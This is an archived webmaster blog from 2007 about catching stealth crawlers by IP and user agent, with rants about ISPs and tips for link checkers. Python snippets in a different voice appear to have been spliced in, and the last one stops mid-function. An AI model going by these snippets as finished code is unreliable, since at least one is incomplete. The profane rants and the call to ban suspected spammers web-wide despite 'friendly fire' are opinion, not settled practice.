216.40.222.98 -> ev1s-216-40-222-98.ev1servers.net.
67.19.114.226 -> w103.networkharmony.com.
67.19.250.26 -> 1a.fa.1343.static.theplanet.com.
70.85.113.242 -> f2.71.5546.static.theplanet.com.
74.53.243.226 -> e2.f3.354a.static.theplanet.com.
74.53.243.242 -> f2.f3.354a.static.theplanet.com.
74.53.244.18 -> 12.f4.354a.static.theplanet.com.
74.53.249.34 -> 22.f9.354a.static.theplanet.com.
74.86.209.74 -> templatestill.com.
74.86.249.98 -> westhoste.net.
75.125.18.178 -> ev1s-75-125-18-178.ev1servers.net.
75.125.47.162 -> ev1s-75-125-47-162.ev1servers.net.
75.125.52.146 -> ev1s-75-125-52-146.ev1servers.net.
84.19.176.208 -> ns.km22118.keymachine.de.
87.118.118.111 -> ns.km31417.keymachine.de.
87.118.98.57 -> ns.km22427.keymachine.de.
87.118.98.62 -> ns.km22426.keymachine.de.

There you go, all the IPs I've seen them use and they can shove the rules of their company where the sun doesn't shine.
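A list in that "IP -> hostname." shape is just each logged IP run through a reverse DNS lookup. Here's a minimal sketch using the standard `socket.gethostbyaddr`. The `annotate` name is hypothetical. The IPs would come from log entries carrying the LiteFinder user agent. The lookup is injectable so the sketch can run without a network.

```python
import socket


def annotate(ips, lookup=socket.gethostbyaddr):
    """Return sorted "ip -> hostname." lines, one per unique IP."""
    lines = []
    for ip in sorted(set(ips)):
        try:
            # gethostbyaddr returns (hostname, aliases, addresses).
            lines.append(f"{ip} -> {lookup(ip)[0]}.")
        except OSError:
            lines.append(f"{ip} -> (no PTR record)")
    return lines
```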

Surge Protection - Get it before it's TOO LATE!

I know many of you think surge protection is a bunch of hype, but the father of a good friend just found out a few days ago that surge protection is a must-have. Lightning apparently zapped their house and took out every single appliance in one shot: TVs, radios, computers and a nice big Wurlitzer organ, totaling over $20K in damages.

That was just enough to make me get off my ass and double check that all of our most expensive gear, like my computer, printers, big screen TV, DVRs, etc. were all plugged into the proper place on the UPS/Surge protector since the rainy season is starting in California.

For those of you who still have doubts about surge protection and figure lightning will never hit your house, let me tell you about an old buddy of mine from Kansas City. Lightning hit his computer through the power line and fried the box. He went out and got a new computer and a surge protector for the electrical line. About a year later, lightning hit the phone line and blew his computer apart when it came in via the modem. Again, he replaced the computer, and this time he put a surge protector on his phone line as well. Unfortunately, God didn't want him to have a computer. The 3rd time, lightning shot in through the window and blew the computer off his desk. Last time I checked, they don't make surge protectors for windows.

Anyway, if you don't have a surge protector for your electrical, phone and cable it's time to install one and move the computer away from the window so lightning can't easily blast it off your desk just to show you who's boss.

GEO Targeting Issues with Sprint Wireless Broadband

Testing my new Sprint Wireless Broadband turned up something I didn't expect regarding Geo targeting. The IP addresses it uses are all attributed to Southern California, and I'm in Northern California.

I understand that privacy is a concern and you don't want people to know exactly where you are, but being off by 600 miles is a bit much. Nothing that tries to Geo target works right, and some things become downright annoying, such as AdSense showing you ads for local shit in Irvine, California.

Nothing show stopping, just annoying.

Saturday, December 01, 2007

Comcast Dead While Sprint Hobbles Along

My connection to the internet has been so reliable for so many years that I had almost forgotten that the whole goddamn thing is cobbled together with baling wire, band-aids and bubble gum.

Comcast, in their infinite wisdom, apparently did an upgrade to the network sometime Thursday afternoon and BOOM! the whole city went offline. When I called, the message on their support line said people in my area just needed to power cycle the modem and it would reconnect. OK assholes, I had power cycled the fucking modem BEFORE I called your tech support dept. to dole out bushels of meaningless platitudes. It still wasn't working, so it's obvious I'm already fucked.

The tech support lady answered and asked for my MAC address. Within a couple of seconds she confirmed that I was fucked and that someone with a can of Vaseline and some rubber gloves would be sent out the next morning to finish the job, er, FIX the problem.

Next morning someone shows up right on time, which was an omen, and diagnoses the connection. He claims everything is OK coming in, so it must be the old modem (yeah right, whatever), swaps out the modem, gets us online and leaves.

Looks good, quick fix, right?

Wrong!

The new cable modem starts randomly taking a dump for a few minutes here and there and the next morning promptly decides to take a permanent dump and never comes back.

<SARCASM style: thick>
Yup, it was definitely the old modem having a problem.
</SARCASM>

So it's back to waiting on hold for the next technical support moron who knows way less about modems than I do. I've written software to drive a modem, which makes the idiotic conversation we're about to have not only insulting but maddening.

Here comes the idiot tech support questions:

TS: "Can you power cycle the modem for me?"
ME: "If that worked we wouldn't be on the phone at the moment!"

TS: "Do you have the modem connected directly to the computer or a hub?"
ME: "What does that matter? A stand-alone cable modem plugged into Comcast will sync to the network if it can find the network, which it can't. Would you like me to explain what those lights on the front of the modem mean? I've got plenty of time since I can't get onto the internet and do any work..."

TS: "We can't seem to contact your modem from here so we'll need to send out a service technician."
ME: "Same problem as yesterday that you already 'fixed' once but we can try it again."

Anyway, they finally gave us a time for the next service technician to arrive tomorrow.

To be honest, if Comcast is down it shouldn't matter because our city is Wifi enabled!

Yeah, right, I'm on the border of the city's Wifi signal so I can see it every now and then but it's not strong enough to connect with.

However, a bunch of idiot neighbors have unprotected wireless networks that I could just hop on and use if I were that kind of guy, tempting but no thanks.

Anyway, here I sit with ZERO faith in Comcast at the moment. So I ran over to the Sprint store and picked up one of those nifty Wireless Broadband USB devices with an unlimited bandwidth plan for $60/month and a screaming [cough] 500kbps, but it beats dial-up.

Bring that new Sprint toy home, plug it in to the USB port, it self-installs and works out of the box without a hitch, sweet, right?

Well, it would be sweet except their fucking "Sprint Mobile Broadband Connection Manager" started crashing all the time. The application just blows up without warning, BLAMMO!, and down goes your connection. As a matter of fact, my computer NEVER crashes and this unstable software managed to lock up the PC to the point I had to do a cold reboot.

Guess I'll focus on the positive side that at least Sprint got me online, for some period of time, which is more than I can say for Comcast in the last few days.

They better get this shit fixed tomorrow because I'm bordering on going ballistic at the moment.

UPDATE: Comcast actually showed up on time and figured out the problem the second time around. It was never the modem they replaced causing the problem, but what else is new.

Monday, November 19, 2007

Live.com's Search Spam Hysteria and Area 131.107.0.*

There are a lot of recent posts from people reaching a near hysteria fever pitch over what appears to be Live.com scouring the 'net looking for black hat sites doing things like cloaking or worse.

What they're all posting about is that MS Live.com appears to be stealth crawling with bogus query strings, looking for pages that change their response based on the query and display advertising related to the topic that brought you to the page, which is what cloaked web sites do.
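If you want to see whether your own pages would trip a check like that, here's a minimal sketch under my own assumptions (nobody outside Microsoft knows how their check actually works): append a random, meaningless query parameter, fetch the page both ways with whatever HTTP client you like, and compare the two bodies. The parameter name `q` and the 0.9 similarity threshold are arbitrary picks for illustration.

```python
import difflib
import secrets
from urllib.parse import urlencode, urlsplit, urlunsplit


def with_bogus_query(url: str) -> str:
    """Return the URL with a random, meaningless query parameter appended."""
    parts = urlsplit(url)
    extra = urlencode({"q": secrets.token_hex(4)})  # "q" is an arbitrary name
    query = f"{parts.query}&{extra}" if parts.query else extra
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


def looks_query_sensitive(plain_body: str, probed_body: str, threshold: float = 0.9) -> bool:
    """True if the page served for the bogus query differs noticeably from the plain one.

    autojunk=False stops SequenceMatcher from discarding common characters,
    which would otherwise skew the ratio on long HTML pages.
    """
    matcher = difflib.SequenceMatcher(None, plain_body, probed_body, autojunk=False)
    return matcher.ratio() < threshold
```

Keep in mind that plenty of legitimate pages (rotating ads, session IDs, timestamps) change from one request to the next, so a low similarity is a hint to go look, not proof of cloaking.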

However, I've seen a few thousand other mysterious page requests from that IP range which most of you probably haven't noticed that I'll share below, which may or may not be related, hard to say at this point.

Sometimes, but not always, the IP address claims to be coming via a proxy such as:

1.1 SEA-PRXY-02
1.1 SEA-PRXY-01
"1.1 NET-PRXY-03, 1.1 NET-PRXY-04"
1.1 NET-PRXY-04
1.1 RED-PRXY-30
... and more
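Those proxy names arrive in the Via request header, and when several proxies are chained they're comma-separated, which is why one of them shows up as a pair. Here's a minimal sketch for splitting a Via value into hops so you can log or match on the proxy names; it follows the general Via syntax from the HTTP spec and assumes nothing about Microsoft's proxies beyond the sample values above.

```python
import re

# Each Via hop is "[protocol-name/]protocol-version received-by [comment]",
# and multiple hops are separated by commas.
_VIA_HOP = re.compile(r"^\s*(?:[A-Za-z]+/)?(\d+(?:\.\d+)?)\s+([^\s,]+)")


def via_hops(via_header: str) -> list[tuple[str, str]]:
    """Split a Via header value into (protocol-version, proxy-host) pairs.

    Simple comma splitting; a comment that itself contains commas would confuse it.
    """
    hops = []
    for entry in via_header.strip().strip('"').split(","):
        match = _VIA_HOP.match(entry)
        if match:
            hops.append((match.group(1), match.group(2)))
    return hops
```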

Maybe some of this is unrelated, maybe it's totally relevant; who knows except MS, and they aren't telling. However, starting as far back as 01/07/2007 my bot blocker started trapping what appeared to be stealth crawl activity in the 131.107.0.* range:

01/07/2007 131.107.0.96
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/12/2007 131.107.0.95
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/15/2007 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"

Then it appears a human responded to a bot challenge:

01/15/2007 15:56:38 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"

Then this BLANK user agent started hitting on the same day:

01/15/2007 131.107.0.86 ""

Then the sudden challenges and responses on 131.107.0.104 happened again so maybe that really was a human behind at least one of those proxies, who knows.

The blank UA on 131.107.0.86 kept asking for thousands of pages for many weeks, including "/robot.txt" that made me giggle.

In the middle of all this there's this little nugget:

03/29/200 131.107.0.96 "Wget/1.8.1"

Then in March there's another rash of challenges in 131.107.0.* and a single response on 131.107.0.104:

04/28/2007 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"

What does it all mean? No clue yet...

Suddenly, after months, the blank UA megacrawl on 131.107.0.104 seems to come to a close.

Then we get this little gem:

05/30/2007 131.107.0.95 "LWP::Simple/5.805"

June has a mix of challenges and a couple of responses so humans may use that IP block every now and then.

Then these nuggets pop up:

07/10/2007 131.107.0.95 "Java/1.6.0_01"
07/10/2007 131.107.0.96 "Wget/1.8.1"
07/13/2007 131.107.0.86 "" the blank UA starts crawling again.

Blank UA shows up on other IPs:

07/23/2007 131.107.0.101 ""
07/23/2007 131.107.0.104 ""
07/23/2007 131.107.0.96 ""
07/24/2007 131.107.0.73 ""
07/26/2007 131.107.0.96 ""
07/27/2007 131.107.0.95 ""

Now one IP with a blank UA crawls for a few weeks:

10/16/2007 to 11/05/2007 131.107.0.104 ""

Then the Perl crawl begins:

11/15/2007 131.107.0.96 "libwww-perl/5.805"
11/16/2007 131.107.0.95 "libwww-perl/5.805"

And those last two IPs are still currently crawling as "libwww-perl/5.805" as I write this.

When you add it all up, a couple of things come to mind: Microsoft may be checking for cloaking, testing some pet projects, and/or checking how websites respond to a browser user agent versus user agents that are normally blocked. It's probably a mix of all of the above.
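If you want to pull the same kind of summary out of your own logs, here's a minimal sketch. It assumes you've already parsed each log line into an (IP, user agent) pair, and it only counts hits from 131.107.0.0/24, the 131.107.0.* block discussed here; empty user agents are labelled `<blank>` so they stand out.

```python
import ipaddress
from collections import Counter

# The block discussed in this post (131.107.0.*).
WATCHED = ipaddress.ip_network("131.107.0.0/24")


def tally_user_agents(records):
    """Count (ip, user_agent) records that come from the watched block.

    Blank user agents are counted under the label "<blank>".
    """
    counts = Counter()
    for ip, user_agent in records:
        if ipaddress.ip_address(ip) in WATCHED:
            counts[user_agent or "<blank>"] += 1
    return counts
```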

See the response from msndude msg#3442263 on WebmasterWorld:

First, we appreciate the concerns and issues that have been raised and apologize for any incovenience this might have caused.
Second, we want to explain what this is all about. The traffic you are seeing is part of a quality check we run on selected pages. While we work on addressing your conerns, we would request that you do not actively block the IP addreses used by this quality check; blocking these IP addresses could prevent your site from being included in the Live Search index.
Please keep the feedback and thoughts coming as we will use this to help improve this process and make sure that it impacts your sites as little as possible.

Please tell me what gives you the right to scan thousands of pages without permission and then threaten to dump our ass if we don't let you run rampant without control over our website?

That's some pretty big balls even for Microsoft!

Since it's annoying some people for no sane reason I say go block the IP range and go back to sleep because Microsoft doesn't send enough traffic to put up with this abuse in the first place.

Besides, Microsoft has some damned explaining to do before they have any room to bully people as I've got quite the list of documented abuse from that IP range that would justify anyone blocking the bad behavior exhibited on 131.107.0.*.

That's my $0.02.

FIRST LOOK: Yahoo Crawler Using Firefox UA

Woke up this morning to find my bot blocker had bitch slapped 300+ crawl attempts by Yahoo using the following criteria:

74.6.22.170 [llf520057.crawl.yahoo.net.] requested 302 pages as
"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071102 BonEcho/2.0.0.4"

Upon further examination, it appears this activity started on 11/17/2007. The IP address used is a Yahoo proxy, and some of the forwarded IPs were:

74.6.18.46 -> rz502516.crawl.yahoo.net.
74.6.18.160 -> rz502426.crawl.yahoo.net.
74.6.18.163 -> rz502429.crawl.yahoo.ne

A lot more 74.6.18.* IPs, etc. You get the idea...
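Before blocking or whitelisting anything claiming to be a search engine crawler, it's worth doing the usual two-step DNS check: reverse-resolve the IP, make sure the hostname is under the crawler's domain (crawl.yahoo.net in this case), then forward-resolve that hostname and confirm it maps back to the same IP. Here's a minimal sketch using Python's standard socket calls; it only shows the IP belongs to Yahoo, it says nothing about why the crawler is wearing a Firefox UA.

```python
import socket


def host_in_domain(hostname: str, domain: str) -> bool:
    """True if hostname equals domain or is a subdomain of it (trailing dots ignored)."""
    host = hostname.rstrip(".").lower()
    domain = domain.rstrip(".").lower()
    return host == domain or host.endswith("." + domain)


def verify_crawler_ip(ip: str, domain: str = "crawl.yahoo.net") -> bool:
    """Reverse-resolve ip, check the domain, then forward-resolve to confirm the match."""
    try:
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
        if not host_in_domain(hostname, domain):
            return False
        _name, _aliases, forward_addresses = socket.gethostbyname_ex(hostname)
    except OSError:  # covers socket.herror and socket.gaierror
        return False
    return ip in forward_addresses
```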

What was curious is the version of Firefox claimed to be Bon Echo which if I'm not mistaken was pre-release Firefox 2 code.

Didn't look like they were making screen shots based on today's activity, unless they had already cached the images, so I'm not sure what in the hell Yahoo's up to at this point.

Take a look in your logs as I find it hard to believe I'm the only one seeing this.

Saturday, November 17, 2007

Don't Just Block Spam, Block Spammers Too!

Most modern blog anti-spam efforts are based on just protecting the comment forms, which is a very narrow focus. When some spambot or someone posts something bad it's automatically trapped and discarded by tools like Akismet. However, I don't think this solution goes far enough to solve the problem, as it only puts a band-aid on the comments page.

What I'm going to suggest, which I recently did to a few of my sites, is to go a step beyond just the comments page and punish bad behavior with banishment.

Why not ban the spammer?

You've trapped the spam and you know he/she/it is up to no good so why let them continue to access your site at all?

What if tools like Akismet not only blocked the spam but locked the spammer out of every site running Akismet worldwide?

If Akismet and a bunch of the other anti-spam tools could pool their spammer data then you could effectively block them from ever accessing any website ever again.

Now THAT's how you punish a spammer, ban him from the worldwide community!

This is not a new concept, as RBL lists have been used for things like this in the past: spammers' IPs were not only used to block incoming mail but were added to the server firewall as well. However, the more recent web-based technologies have tended to be very narrowly focused and missed the bigger opportunity to thwart problem spammers in a better way, such as ACCESS DENIED to the web in general.
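For anyone who hasn't used one, a DNS-based blocklist (the RBL idea above) is queried by reversing the IPv4 octets, appending the list's zone, and doing an ordinary DNS lookup: an answer means the IP is listed, no answer means it isn't. Here's a minimal sketch; `dnsbl.example.org` is a placeholder, so substitute a real list and check its usage policy first. Some lists also encode the listing reason in the returned address, which this sketch ignores.

```python
import ipaddress
import socket


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL lookup name: IPv4 octets reversed, followed by the list's zone."""
    octets = ipaddress.IPv4Address(ip).exploded.split(".")
    return ".".join(reversed(octets)) + "." + zone


def is_listed(ip: str, zone: str = "dnsbl.example.org") -> bool:
    """True if the DNSBL returns any address for the IP.

    The default zone is a placeholder; replace it with a real blocklist zone.
    """
    try:
        socket.gethostbyname(dnsbl_query_name(ip, zone))
        return True
    except socket.gaierror:  # NXDOMAIN (or a failed lookup) is treated as "not listed"
        return False
```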

Consider that many well-protected modern websites that are cranking up security already block access from data centers and proxy servers, leaving spammers few options besides direct residential connections and botnets. Any botnet a spammer rents would have to consist of hijacked residential PCs, since servers in data centers are often blocked already. Therefore, if spammers were forced to use botnets to do their bidding, they would unwittingly get innocent people blocked, and those people would soon discover their machines are infected and get them fixed.

What a concept!

Ostracizing spammers could even get people with compromised PC's off the botnet too!

Spammers would think twice about ever spamming again if each attempt permanently cost them more and more access to the web. So maybe, just maybe, we can end spam in our lifetime just by redeploying anti-spam technology as a complete front-end security system for the website: once the comment form triggers the alarm, it alerts the entire anti-spam community.

OK, there could be a few innocent casualties but the greater good to permanently eradicate spam and even botnets completely outweighs the impact of a little friendly fire.

I'm banning spammers to clean up the online environment, how about you?

Friday, November 16, 2007

Microsoft Crawling with Perl Script?

Wonder what the boys in Redmond are up to using Perl instead of one of their beloved Microsoft languages?

131.107.0.96 [tide526.microsoft.com.] requested 6 pages as "libwww-perl/5.805"
131.107.0.95 [tide525.microsoft.com.] requested 6 pages as "libwww-perl/5.805"

Makes you go Hmmmm...

Thursday, November 15, 2007

That Rant Wasn't About Anal Sex!

My heartwarming Christmas rant from last year entitled "Good Will Toward Men but FUCK WOMEN DRIVERS" has almost ranked in the top 10 for anal sex under #8 for 'but fuck'.

Ah well, one "T" short of major porn affiliate ads running on the site.

Maybe next year we'll be blessed with a 'butt fuck' ranking.

Sigh, until then I can only dream of free porn money....

Sunday, November 11, 2007

Attributor Post-Mortem Copyright Compliance Revisited

My first post about the emergence of Attributor was about a year ago and I thought it was time to review and see what we've learned since then.

Here's where they've crawled from that we've spotted:

63.209.14.55 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind27.attributor.com:3128 FORWARD=10.50.40.74

63.209.14.10 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind25.attributor.com:3128 FORWARD=10.50.40.74

209.51.152.146 "Attributor.comBot"

66.231.188.172 "Attributor.comBot"

63.209.14.53 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

63.209.14.7 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

Now the amusing part is the IP 209.51.152.146: it's a proxy, and it appears they aren't any smarter than the rest of the bots, as 340+ crawls have come via that IP this year, including msnbot, Googlebot, Twiceler, Gigabot, Snapbot and some others, so you're in fine company with other stupid crawlers out there.

What's curious is that 66.231.188.172 is one of Gigablast's IPs. Some of the others may be as well, since they resolve to Level 3 blocks like other Gigablast IPs do, but I didn't look hard enough to confirm; lazy, I guess.

Now let's examine one of my favorite statements on their website:

...you will no longer have to hold back top content or impose technical barriers on its viewing; instead, quality content can be made more easily available to a larger number of consumers.

Excuse me?

My technical barriers [not used on this blog] stop the problem in the first place just so I don't need to pay anyone to go chasing my content around the billions of pages on the web. As a matter of fact, my technical barriers are what trapped your crawl attempts above and identified what IPs your bots were using. That means your technology can't get past my technology, so you'll never know if I'm stealing anyone's material, but I'm pretty sure you aren't stealing my bandwidth finding out.

So now you have to ask yourself which method is easiest to stop content theft, blocking data centers and bulk downloaders on the fly or scanning billions of web pages looking for theft after the cows have already left the barn?

Bot blocking wins hands down as it's more cost effective without a doubt.
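Spotting a bulk downloader on the fly doesn't take much: count each IP's requests over a sliding time window and flag it once it goes over a limit. Here's a minimal sketch; the 30-requests-per-60-seconds default is an arbitrary number for illustration, not a recommendation, and a real bot blocker would combine it with data center checks and whitelisting of legitimate crawlers.

```python
import time
from collections import defaultdict, deque
from typing import Optional


class BulkDownloadDetector:
    """Flag IPs that request more than max_requests pages within window_seconds."""

    def __init__(self, max_requests: int = 30, window_seconds: float = 60.0):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)  # ip -> timestamps of recent requests

    def record(self, ip: str, now: Optional[float] = None) -> bool:
        """Record one request from ip and return True if it is over the limit."""
        now = time.monotonic() if now is None else now
        hits = self._hits[ip]
        hits.append(now)
        # Drop timestamps that have slid out of the window (the newest one always stays).
        while now - hits[0] > self.window_seconds:
            hits.popleft()
        return len(hits) > self.max_requests
```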

The best part is if someone wants to license your content you'll get 100% of the profits and not share with some company that wants to chase around the vast wasteland of the web looking for violators.

Maybe Attributor has some other places they crawl from without the user agent identifying the source, but that just means the bot blocker will stop and quarantine some anonymous IP address and we may never know it's really them.

Doesn't matter, I'm still banking on proactive content theft prevention technology and not reactive technology as it's easier to keep your cows at home when the fences are all closed and patrolled in the first place than try to round 'em up later.

Saturday, November 10, 2007

Websense Stealth Crawler Bypassing Security?

What I find amusing are security companies that claim to be protecting the web while violating access control measures on web servers all over the world.

Here's what I see coming from WebSense that's obvious:

208.80.193.29 Mozilla/5.0 (compatible; Konqueror/3.0-rc2; i686 Linux; 20020108)
208.80.193.30 Mozilla/5.0 (compatible; Konqueror/3.0-rc4; i686 Linux; 20020418)
208.80.193.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.34 Mozilla/5.0 (compatible; Konqueror/3.1; i686 Linux; 20020213)
208.80.193.36 Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020328)
208.80.193.37 Mozilla/5.0 (compatible; Konqueror/3.1-rc4; i686 Linux; 20020520)
208.80.193.41 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)
208.80.193.42 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.51 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312460)
208.80.193.52 Mozilla/5.0 (compatible; Konqueror/3.0-rc6; i686 Linux; 20020204)

It makes me wonder if deliberately trying to bypass security measures in place that are designed to keep robots like WebSense off a server, such as robots.txt, .htaccess and other access controls, may violate the "Computer Hacking and Unauthorized Access Laws"?
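For comparison, here's what honoring robots.txt looks like for a crawler that identifies itself, sketched with Python's standard urllib.robotparser. The `ExampleSecurityBot` name is made up for the example; the catch, and the whole point of the complaint above, is that robots.txt only works when a crawler announces who it is instead of posing as Konqueror or MSIE.

```python
from urllib.robotparser import RobotFileParser


def allowed_by_robots(robots_txt: str, user_agent: str, url: str) -> bool:
    """Return whether robots_txt permits user_agent to fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


# Hypothetical robots.txt that shuts out one named crawler and allows everyone else.
ROBOTS_TXT = """\
User-agent: ExampleSecurityBot
Disallow: /

User-agent: *
Disallow:
"""
```

A crawler sending a generic MSIE user agent falls through to the `*` rule and is allowed, which is exactly how a stealth crawler sidesteps a block aimed at its real name.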

Proving they've been busily sneaking around on lots of servers won't be too hard either.

Maybe WebSense should just claim any site that blocks them is off limits since we don't want them on our servers instead of trying to circumvent our security measures.

That would make too much sense wouldn't it?

Of course someone could claim that bad sites would just cloak clean content if they know it's WebSense. However, I'd rather give explicit permission for WebSense and then it wouldn't bother me so much if they crawled in stealth from a different IP address knowing that I gave permission in the first place.

Here are some of their known IP ranges:

Websense 66.194.6.0 - 66.194.6.255
Websense 74.211.167.208 - 74.211.167.215
Websense, Inc 208.80.192.0 - 208.80.199.255

Not sure these are the same company as a couple are in Canada and the other is in a different city, but what the heck, make up your own mind on these:

Websense Inc 67.117.201.128 - 67.117.201.143
Websense Systems Inc. 64.69.80.104 - 64.69.80.111
Websense Systems Inc. 64.69.80.96 - 64.69.80.103
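If you'd rather check these in code than in a firewall, here's a minimal sketch that tests an IP against the start-end ranges exactly as listed above, including the three of uncertain ownership, so drop those if you're not convinced.

```python
import ipaddress

# Start/end pairs copied from the ranges listed above.
WEBSENSE_RANGES = [
    ("66.194.6.0", "66.194.6.255"),
    ("74.211.167.208", "74.211.167.215"),
    ("208.80.192.0", "208.80.199.255"),
    # Ownership uncertain, see the note above.
    ("67.117.201.128", "67.117.201.143"),
    ("64.69.80.104", "64.69.80.111"),
    ("64.69.80.96", "64.69.80.103"),
]


def in_any_range(ip: str, ranges=WEBSENSE_RANGES) -> bool:
    """True if ip falls inside any inclusive (start, end) IPv4 range."""
    addr = ipaddress.IPv4Address(ip)
    return any(
        ipaddress.IPv4Address(start) <= addr <= ipaddress.IPv4Address(end)
        for start, end in ranges
    )
```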

There you go, some good bot blocking to go with your morning coffee should start off a fine Monday!

Thursday, November 08, 2007

How to Super Charge Your Link Checker

Most external link checkers people use can only detect the simple problems with your links such as servers being offline, missing pages (404 errors), or some other type of server error making your outbound link technically broken. These old school link checkers don't know how to detect the myriad of soft 404 errors that send a "200 OK" as a result. Worse yet, traditional link checkers aren't smart enough to detect whether your outbound links have changed hands and are possibly in a domain park, converted to a porn site, or possibly contain malware.

Here are a few tips for supercharging your link checker so it detects domains that have transitioned into domain parks or parked pages and catches those soft 404 errors.

1. Do a full trip DNS check on your domain names.

Example of a full trip DNS check: somedomain.com -> ip address -> somedomain.com

For some parked domains, the full trip DNS lookup returns hostnames like these:

landing.hitfarm.com.
sedoparking.com.
ddwww.tucows.com.
information.com.

Parked pages on GoDaddy are a bit more complex because it's a combination of parkwebwin + secureserver.net but not too terrible to interpret:

parkwebwin-v03.prod.mesa1.secureserver.net
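Here's a minimal sketch of that full trip lookup using Python's standard socket calls, plus a check of the resulting hostname against the parking hosts listed above. The marker list is just those examples, so expect to keep adding to it, and plain substring matching can misfire (a marker like "information.com" could also match an unrelated hostname that happens to contain it).

```python
import socket
from typing import Optional

# Fragments of the parked-page hostnames listed above; extend as you find more.
PARKING_MARKERS = (
    "landing.hitfarm.com",
    "sedoparking.com",
    "ddwww.tucows.com",
    "information.com",
    "parkwebwin",  # GoDaddy parked pages: parkwebwin-*.secureserver.net
)


def full_trip_dns(domain: str) -> Optional[str]:
    """Resolve domain -> IP address -> hostname; return the hostname, or None on failure."""
    try:
        ip = socket.gethostbyname(domain)
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
    except OSError:  # covers socket.gaierror and socket.herror
        return None
    return hostname


def looks_parked(hostname: str) -> bool:
    """True if the reverse hostname matches a known domain-parking host."""
    host = hostname.rstrip(".").lower()
    return any(marker in host for marker in PARKING_MARKERS)
```

In a link checker you'd call `full_trip_dns()` on each outbound domain and pass any hostname it returns to `looks_parked()`.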

2. Whois Lookup for more detailed information.

If the full trip DNS fails to uncover anything useful then getting the WHOIS information about the domain name and/or IP address might yield interesting results. You might find the site is hosted at Thoughtconvergence.com which runs trafficz.com, a domain park, or is hosted at Parked.com (duh!) or shows DNS servers such as NS1.PARKED.COM.
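WHOIS output isn't standardized, so any parsing is best effort. Here's a minimal sketch that assumes the common "Name Server: ..." line format for extracting name servers and simply searches the raw record for the parking clues mentioned above; the marker list is only those examples.

```python
import re

# Parking clues from the examples above; extend as you find more.
PARKING_WHOIS_MARKERS = ("parked.com", "trafficz.com", "thoughtconvergence")


def name_servers(whois_text: str) -> list[str]:
    """Extract name servers from lines shaped like 'Name Server: NS1.EXAMPLE.COM'."""
    return [ns.lower() for ns in re.findall(r"(?im)^\s*name server:\s*(\S+)", whois_text)]


def whois_suggests_parking(whois_text: str) -> bool:
    """True if any parking clue appears anywhere in the WHOIS record."""
    text = whois_text.lower()
    return any(marker in text for marker in PARKING_WHOIS_MARKERS)
```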

3. Examine the redirects and landing page names.

When you request the URL, assuming you process your own redirects, you can observe that certain types of soft 404 errors redirect to the home page of some servers or a standard default page served up by admin control panels. Additionally, some parked pages also have intermediate redirects that clearly identify the page is being redirected to a landing page which can also be trapped.

Some sites return a "200 OK" but land on a page named something like "404error.html" or "404.asp", and there are a lot of these. Unfortunately, just looking for any page with "404" in the name will kick out many false positives, but recording the landing page names as you find them will quickly build you a good list.

Some samples of various types of 404 pages and URLs you might find:

http_404_filenot_found.htm
erreur404.asp
decommissioned.php
/suspended.page/
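Assuming your checker follows redirects itself and records the final URL, here's a minimal sketch of both checks: matching the landing page name against the samples above (plus "404error.html" and "404.asp") and flagging a deep link that ends up on a site's home page. The name list is only those examples; grow it from your own results.

```python
from urllib.parse import urlsplit

# Landing page names from the examples above; grow this from your own results.
SOFT_404_NAMES = (
    "404error.html",
    "404.asp",
    "http_404_filenot_found.htm",
    "erreur404.asp",
    "decommissioned.php",
    "/suspended.page/",
)


def soft_404_landing(final_url: str) -> bool:
    """True if the URL we finally landed on looks like an error or suspension page."""
    path = urlsplit(final_url).path.lower()
    return any(name in path for name in SOFT_404_NAMES)


def redirected_to_home(requested_url: str, final_url: str) -> bool:
    """True if a link to an inner page was redirected to the site's home page."""
    requested_path = urlsplit(requested_url).path
    final_path = urlsplit(final_url).path
    return requested_path not in ("", "/") and final_path in ("", "/")
```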

4. Examine the page content.

The least accurate method is to actually process the page content of the landing page to look for various fingerprints that can be used to detect a site gone bad. Simple phrases such as "this site is temporarily not available" or "this web site coming soon" can spot sites that are no longer active. The problem with this method is that the text fingerprints can easily be changed, may generate some false positives, and is the least reliable. However, it's often the final recourse to detecting 100s of bad pages so you just keep updating your list of fingerprints as you find them and manually double check these types of broken links for false positives.
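Here's a minimal sketch of that fingerprint check, seeded with the two phrases above. It strips tags with a crude regex and normalizes whitespace and case so a phrase split across markup still matches, and it returns the phrases that hit so you can double check them by hand for false positives.

```python
import re

# Phrases quoted in the text above; keep adding as you find new ones.
DEAD_SITE_PHRASES = (
    "this site is temporarily not available",
    "this web site coming soon",
)


def matching_fingerprints(html: str) -> list[str]:
    """Return the dead-site phrases found in the page's visible text."""
    text = re.sub(r"<[^>]+>", " ", html)       # crude tag stripping
    text = re.sub(r"\s+", " ", text).lower()   # normalize whitespace and case
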